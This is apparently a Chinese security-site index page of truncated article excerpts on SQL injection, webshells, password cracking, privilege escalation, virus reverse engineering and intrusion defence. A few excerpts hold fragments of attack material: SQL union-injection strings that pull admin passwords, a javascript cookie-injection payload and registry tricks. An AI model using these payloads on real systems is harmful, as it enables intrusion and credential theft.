差异备份拿webshell:SQL log备份上WEBSHELL整理总结
来源:安全中国当SQL注入是得到DB权限时候接下来可以做工作很多象找管理员密码后台管理这些都可以帮助你拿到WEBSHELL,但是这篇文章讲是log备份,LOG备份出来小马体积小,而且备份成功可性很大所以是我作为对DB权限第种试探思路方法. 但是在LOG备份中,我们经常会遇到些很让我们头痛问题,那就是闭合问题我在这里做个整理总结也 好让我们对不能闭合思路方法有个全面了解. 1.先介绍下LOG备份这个... [阅读全文]
vbs解密:alpha2 shellcode解密的vbs脚本
来源:安全中国alpha2 shellcode解密vbs脚本 author:lcx fromhttp://hi.baidu.com/myvbscript/blog/item/bf7ce603b9a3e8733812bb44.html ’介绍说明:只针对alpha2TYIIIIIIIIIIIIIIII这样加密来解密没有做更多容错处理只是解出下载urlexe地址般情况下该url加密串是RHpt... [阅读全文]
禁止指定程序运行:禁止指定程序运行的思路方法
来源:安全中国禁止指定运行思路方法 reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\要禁止运行文件" /v debugger /t reg_sz /d debugfile.exe /f 比如要禁用IGM.EXE,那么就要输入这个命令 reg add "HKLM\S... [阅读全文]
mysql数据库:详细讲解用SQLyog来分析MySQL数据库
来源:赛迪网用SQLyog来分析MySQL数据库: SOLyog下载、安装以及使用很简单我去了相关网站WebSite下载它只有384K字节大小它把两个文件(个可执行文件.exe和个动态链接库文件.dll)安装到C:\Program Files\SQLyog路径下然后运行可执行文件 安装后没有必要再访问该网站WebSite了我访问该网站WebSite是得到了个消息说它域名没有设置(c... [阅读全文]
十 2种 Windows 操作系统常用密码破解
来源:赛迪网在日常操作中我们经常要输入各种各样密码例如开机时要输入密码 QQ时也要先输入密码假如你忘记了这些密码就有可能用不了机器、打不开文件、不能聊天...... 也许还会造成很大损失!下面我们就介绍电脑操作中常用密码破解思路方法希望能解你燃眉的急! 、遗忘了SYSTEM密码 如果你遗忘了CMOS设置中SYSTEM密码就无法启动机器了解决办法只能是:打开机箱把电池取下、正负极... [阅读全文]
推荐:Oracle web环境注射技术
作者:剑心前言 本人不是个专业数据库管理员也不是个专门研究oracle安全研究员文中语句很多都写得非常不专业对数据库理解也不够甚至很多语句可能在区别版本上并不适合些技术也是牛人们很早提到过本文只是从个web安全角度来看如何入侵台被防火墙防护Oracle数据库对些入侵技术做了web入侵上整理总结和延伸尽量将原理讲得明白本文也并没有对sql注射中存在些共性进行讨论 如利用substr和经典注射这... [阅读全文]
linux安全: 5个顶级Linux安全工具
来源:安全中国首先没有哪个能做到让你网络或服务器永久地安全安全是个不断改进、评估、再改进持续过程幸运是在linux下有许多好工具在这个过程中能帮助你在这篇文章中我将向你推荐5款我最喜爱安全工具它们能帮助你预防检查响应入侵行为尽管它更容易预防随时可能发生问题但某些时候你遇到问题时你还是需要检查和响应这就意味着在形式危及你需要它们的前你得先熟悉它们使用方法 1、Nmap 为了评估个机器是否容易遵守攻击... [阅读全文]
oraclepassword:Crack Oracle Password
来源:冷漠's Blog注:转载请注明来源Author:Mickey要连接远程 Oracle 500)this.width=500;"图 4 上篇文章: 入侵检测系统正确使用思路方法 下篇文章: 没有... [阅读全文]
入侵检测系统:入侵检测系统的正确使用思路方法
来源:人民网随着网络安全风险系数不断提高曾经作为最主要安全防范手段防火墙已经不能满足人们对网络安全需求 作为对防火墙及其有益补充IDS(入侵检测系统)能够帮助网络系统快速发现网络攻击发生扩展了系统管理员安全管理能力(包括安全审计、监视、进攻识别和响应)提高了信息安全基础结构完整性 IDS被认为是防火墙的后第 2道安全闸门它能在不影响网络性能情况下对网络进行监听从而提供对内部攻击、外部攻击和误操... [阅读全文]
linux路径:linux下寻找web绝对路径的办法
来源:安全中国般来说,linux+apache+mysql是常见搭配,mysql注入可以使用load_file来读取文件信息.但需要知道web绝对路径. 我使用了如下思路方法: 读取默认apachehttpd.conf文件.这是个配置文件,ascii码.里面有个document root变量,后接就是网站WebSite绝对路径.对于虚拟机,有专门vitual host开头系列配置. 这思路方法本人... [阅读全文]
sql注射漏洞:SQL注射漏洞的成因及修补
文章首发IT168安全频道[safe.it168.com]转载请著名作者:伤心鱼【IT168 专稿】最近笔者朋友接到个网站WebSite生意说是给别人做了个网站WebSite 怕出问题让笔者帮忙检测下有没有什么注射或者上传的类漏洞没有话就可以交差了只是针对网站WebSite来检测漏洞所以也不需要去旁注或者ARP 什么首先打开域名 hxxp://www.target.com/ 打看后个就知道这肯定不... [阅读全文]
推荐:SA权限下的思路变通
信息来源:邪恶 8进制信息安全团队(Team)(www.eviloctal.com)文章作者:jxsaqjh注:本文首发于“jxsaqjh500)this.width=500;"哈哈成功了入侵到了这里也就没有什么继续必要了我们已经有了系统权限想做什么都随自己愿意了收拾收拾在管理员桌面上写个提醒.txt告诉他漏洞所在让他尽快修补吧!最后整理总结下在先前以为是系统存储过程删掉了但是后来随着入侵深入才发... [阅读全文]
黑客入侵:浅谈黑客入侵的 4条途径和防护
要想有效防范黑客对我们电脑入侵和破坏仅仅被动安装防火墙是显然不够我们更应该了解些常见黑客入侵手法针对区别思路方法采取区别措施做到有放矢 1、木马入侵 木马也许是广大电脑爱好者最深恶痛绝东东了相信不少朋友都受到过它骚扰木马有可能是黑客在已经获取我们操作系统可写权限前提下由黑客上传(例如下面会提到ipc$共享入侵);也可能是我们浏览了些垃圾个人站点而通过网页浏览感染(利用了IE漏洞);当然... [阅读全文]
随易全站系统cmsez:Cmsez(随易)全站系统 0day
名称:Cmsez Web Content Manage v2.0.0 document.close;"; ; "saveComment": -------------- viewimg.php -------------- ? //image.php 显示附件图片 "file.php"; $user_info[user_level]"Guest" && $confirmtrue){ "mo... [阅读全文]
机器狗 病毒驱动部分逆向分析注释(C代码)
标 题: 【原创】“机器狗”病毒驱动部分逆向分析注释(C代码) 作 者: dream2fly(QQ:838468959) 时 间: 2008.03.13 于深圳科技园 链 接; http://www.dream2fly.net 版 本: 1.0 【软件Software名称】: 机器狗(病毒) 【下载地址】: http://www.dream2fly.net 或 自己搜索下载 【加壳方式】: 未知壳... [阅读全文]
黑客老鸟讲逆向分析:什么是壳及壳的加载过程
来源:安全中国上节课程我主要介绍了什么是pe本次课程我们主要来讲下壳这也是破解软件Software必修课程也是逆向分析里面必修功课 在些计算机软件Software里有段专门负责保护软件Software不被非法修改或反编译它们般都是先于运行拿到控制权然后完成它们保护软件Software任务由于这段和自然界壳在功能上有很多相同地方基于命名规则就把这样称为“壳”了壳分为私密壳和压缩壳 壳示意图 ... [阅读全文]
ndishook:探索NDIS HOOK新的实现思路方法
作者:zhouxiaoyong (zhouhongyun1978_at_gmail.com) 来源:安全焦点 NDIS HOOK是专业级防火墙使用种拦截技术NDIS HOOK重点是如何获得特定协议对应NDIS_PROTOCOL_BLOCK指针获得了该指针接下来就可以替换该协议所注册收发,而达到拦截网络数据目 获得NDIS_PROTOCOL_BLOCK指针思路方法般是用NdisRegisterPro... [阅读全文]
解开高强度文件夹加密大师里面的" 秘密"
题目:解开高强度文件夹加密大师里面“秘密”文章作者:冰sugar[J.S.T]&[E.S.T]此文章已发表在黑客X档案08年第1期杂志上后经本文作者冰sugar友情提交到邪恶 8进制论坛如需转载请务必保留此信息今天我们社团学弟拿了个高强度文件夹加密大师给社长试试说是个这加密文件夹很好东西可以把私藏物品放在文件夹然后加密文件夹我处于好奇也跟了上去看看他又说这是他花了好长时间才找到个不错东西还说网络上... [阅读全文]
加密解密:《加密解密 技术内幕》 3.1 病毒是如何抗动态测试
来源:安全中国我们来讲讲如何在Debugger这样软件Software中生存——呵呵她执行了病毒然后作内存分析 ;----------简单代码做出重要事情------------ .586p .model flat extrn GetProcAddress:PROC extrn GetModuleHandleA:PROC extrn MessageBoxA:PROC extrn Ex... [阅读全文]
微型计算机:《加密解密 技术内幕》2.2 手工构造一个超微型的 PE 文件
作者:块 3毛钱最近构造了个微型 PE 文件下面把构造思路方法和点心得体会写出来和大家交流也算是 对 PE 格式个复习吧 最终构造好文件大小是 180 字节可以在 Win2k 下运行运行后会弹出个消息框 来看看最后生成文件内容: 00000000 4D 5A 00 00 50 45 00 00 4C 01 01 00 75 73 65 72 MZ..PE..L...user 00000010 33... [阅读全文]
des加密解密工具2.1:《加密解密 技术内幕》2.1 有关PE可执行文件的修改
来源:安全中国在windows 9x、NT、2000下所有可执行文件都是基于Microsoft设计种新文件格式Portable Executable File Format(可移植执行体)即PE格式有些时候我们需要对这些可执行文件进行修改下面文字试图详细描述PE文件格式及对PE格式文件修改 1、PE文件框架构成 DOS MZ header DOS stub PE header Secti... [阅读全文]
安全性算法:discuz安全提问算法
作者:amxku来源:amxku's blog今天朋友问我discuz安全提问答案能不能饶过去或者破解我以前就注意过个密码只记得很短以为是substr取MD5,最后看了半天源码确实是MD5加密不过加密过程有点晕 option value="0"无安全提问/optionoption value="1"母亲名字/optionoption value="2"爷爷名字/optionoption value... [阅读全文]
digitizecaptcha:Digitize CAPTCHA + 模板制作思路方法
来源:netXeyes1、获取目标网站WebSite验证码地址在验证码显示地方点击右键——属性=imgtag src="http://www.crazycoder.cn/WebFiles/20099/a77aff38-7a82-402f-b1bc-eb18ae8a05ba.jpg" width=500 _disibledevent=500)this.width=500;"2、创建目标网站WebSi... [阅读全文]
脚本注入:PHP难吗?PHP脚本注入的简单步骤
来源:安全中国1~判断注入点~ :’;and 1=1;and 1=2 -------(跟ASP样) 2~判断是否能进行UNION查询~:and ord(mid(version,1,1))51 -------(通过版本判断4.0以上可用UNION查询) 3~利用order by 暴字段~:order by X ... [阅读全文]
雷驰显卡:雷驰新闻发布管理系统v3.0漏洞很简单
来源:安全中国第个就是得到管理员密码和用户名 在http://127.0.0.1/otype.asp?owen1=文体新闻 加上下面段COOKIES owen2=娱乐新闻 and 1=2 union select 1,admin,3,4,5,6,7,8,password,10,11 from admin where 12 and = (注意要转换下)直接得到管理员用户名和密码 其密码简单加密了第位... [阅读全文]
radmin提权:Radmin软件Software的一次提权窍门技巧
来源:安全中国最近做渗透测试时常碰到RADMIN类东西.. 碰到此类,般我都会先看下对方把RADMIN端口配置成什么..以及相应PASS(加密过) HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Parameters\Parameter //默认密码注册表位置 HKEY_LOCAL_MACHINE\SYSTEM\RAdmin\v2.0\Server\Par... [阅读全文]
js判断语句:判断cookies注入的js语句
作者:lcx 来源:vbs小铺 javascript:alert(document.cookie="参数= "+escape("参数值 and 1=1"));self.open("http://+"document.location.host+document.location.pathname);void(0); javascript:alert(document.cookie="参数="+es... [阅读全文]
千千静听 med 文件格式堆溢出
来源:安全中国千千静听使用是 libmod 来进行 mod 类文件格式处理, 此库在 ReadMed 中没有检查 文件描述长度如果传递个恶意构造值将导致堆溢出 现在采用libmod 软件Software很多都应该存在此问题 下面是构造问题文件代码最后是使用最新版本千千静听 ax 写 poc. /* libmodplug v0.8 load_med.cpp BOOL CSoundFile::Read... [阅读全文]
metasploit:Metasploit渗透工具应用
来源:51cto.com在文章Immunity canvas安全检测工具介绍中叶子对 3个安全漏洞检测工具Metasploit、Immunity CANVAS、Core Impact中Immunity CANVAS做了简单安装使用介绍现在叶子对Metasploit渗透工具应用也做下介绍说明本文主要介绍MetasploitGUI界面简单使用以及命令行模式下使用 Metasploit是款开源安全漏洞... [阅读全文]
